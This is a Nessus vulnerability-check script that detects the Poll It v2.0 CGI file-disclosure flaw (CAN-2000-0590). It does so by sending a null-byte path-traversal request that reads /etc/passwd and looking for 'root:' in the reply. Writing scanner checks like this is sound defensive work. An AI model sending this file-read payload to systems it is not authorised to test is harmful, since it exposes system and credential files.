
#
# This script was written by Thomas Reinke <reinke@securityspace.com>
#
# See the Nessus Scripts License for details
#
# Changes by rd :
#    - attempt to read /etc/passwd
#    - script_id
#

if(description)
{
 script_id(10459);
 script_cve_id("CAN-2000-0590");
 name["english"] = "Poll It v2.0 cgi";
 name["francais"] = "Poll It v2.0 cgi";
 script_name(english:name["english"], francais:name["francais"]);

 desc["english"] = "'Poll_It_SSI_v2.0.cgi' is installed. This CGI has
 a well known security flaw that lets anyone retrieve any file from
 the remote system, e.g. /etc/passwd.

Solution:  remove it from /cgi-bin.

Risk factor : Serious";

desc["francais"] = "Le cgi 'Poll_It_SSI_v2.0.cgi' est install. Celui-ci possde
un problme de scurit bien connu qui permet  a un pirate de lire des
fichiers arbitraires, e.g. /etc/passwd.

Solution: retirez-le de /cgi-bin.

Facteur de risque : Srieux";



 script_description(english:desc["english"], francais:desc["francais"]);

 summary["english"] = "Checks for the presence of /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi";
 summary["francais"] = "Vrifie la prsence de /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi";
   
 script_summary(english:summary["english"], francais:summary["francais"]);

 script_category(ACT_GATHER_INFO);


 script_copyright(english:"This script is Copyright (C) 2000 Thomas Reinke",
         francais:"Ce script est Copyright (C) 2000 Thomas Reinke");

 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 
 exit(0);
}	  
  
#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port) port = 80;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  req = "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00" + string(" HTTP/1.0\r\n\r\n");
  send(socket:soc, data:req);
  r = recv(socket:soc, length:2048);
  close(soc);
 
  if("root:" >< r)
  {
   security_hole(port);
  }
 }
}
